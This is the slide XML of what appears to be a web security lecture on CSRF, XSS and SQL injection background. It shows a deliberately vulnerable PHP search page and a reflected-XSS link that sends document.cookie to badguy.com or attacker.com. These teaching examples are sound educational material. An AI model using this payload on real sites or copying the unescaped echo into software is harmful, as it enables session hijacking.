            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> with fewer privacy problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Sent only on POST, sends only necessary data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Defense against redirect-based attacks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US"/>
              <a:t>Cross Site Scripting  (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Three top web site vulnerabilites</a:t>
            </a:r>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2743200" y="2035175"/>
            <a:ext cx="3962400" cy="3320911"/>
            <a:chOff x="2743200" y="2035175"/>
            <a:chExt cx="3962400" cy="3320911"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="4648200"/>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browser</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="33305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 site forges request from victim browser to victim server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2743200" y="20351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server</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>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Command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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Background for SQL Injection</a:t>
            </a:r>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229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229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229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229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229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229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2297" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="38862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2298"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12299"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12300" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2270125"/>
            <a:ext cx="2576512" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1230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2302"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2303"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2304"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2305"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2306"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230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2308"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2309"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2310"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2311"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XSS example: vulnerable site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>search field on victim.com:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;    &lt;TITLE&gt; Search Results &lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for &lt;?php echo $_GET[term] ?&gt; :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;   &lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="4495800"/>
            <a:ext cx="4876800" cy="1998663"/>
            <a:chOff x="3505200" y="4495800"/>
            <a:chExt cx="4876800" cy="1998031"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13317" name="Rounded Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="4495800"/>
              <a:ext cx="4419600" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13318" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5580993" y="5155324"/>
              <a:ext cx="1387366" cy="614855"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T1" fmla="*/ 614855 h 614855"/>
                <a:gd name="T2" fmla="*/ 504497 w 1387366"/>
                <a:gd name="T3" fmla="*/ 409904 h 614855"/>
                <a:gd name="T4" fmla="*/ 0 w 1387366"/>
                <a:gd name="T5" fmla="*/ 0 h 614855"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1387366"/>
                <a:gd name="T10" fmla="*/ 0 h 614855"/>
                <a:gd name="T11" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T12" fmla="*/ 614855 h 614855"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1387366" h="614855">
                  <a:moveTo>
                    <a:pt x="1387366" y="614855"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061545" y="563617"/>
                    <a:pt x="735725" y="512380"/>
                    <a:pt x="504497" y="409904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273269" y="307428"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:no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3319" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6156391" y="5785945"/>
              <a:ext cx="2225609" cy="707886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>echo search term </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>into response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838200" y="1676400"/>
            <a:ext cx="7848600" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="76200"/>
            <a:ext cx="7772400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bad input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1143000"/>
            <a:ext cx="2590800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1295363" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1219200"/>
            <a:ext cx="8305800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Consider link:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(properly URL encoded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		&lt;script&gt; window.open(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			“http://badguy.com?cookie = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			document.cookie )  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0"/>
              <a:t>What if user clicks on this link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Browser goes to    victim.com/search.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Victim.com returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Results for &lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Browser executes script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sends badguy.com   cookie  for victim.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:latin typeface="Courier New"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53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536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62000" y="2247900"/>
            <a:ext cx="6875463" cy="4076700"/>
            <a:chOff x="762000" y="2247900"/>
            <a:chExt cx="6875463" cy="4076700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15380" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762000" y="5257800"/>
              <a:ext cx="4648200" cy="10668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5381" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4381500" y="2247900"/>
              <a:ext cx="3255963" cy="295275"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="TextBox 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4667250"/>
            <a:ext cx="5334000" cy="1962150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Results for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  window.open(http://attacker.com? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ... document.cookie ...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="1436688" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15366" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
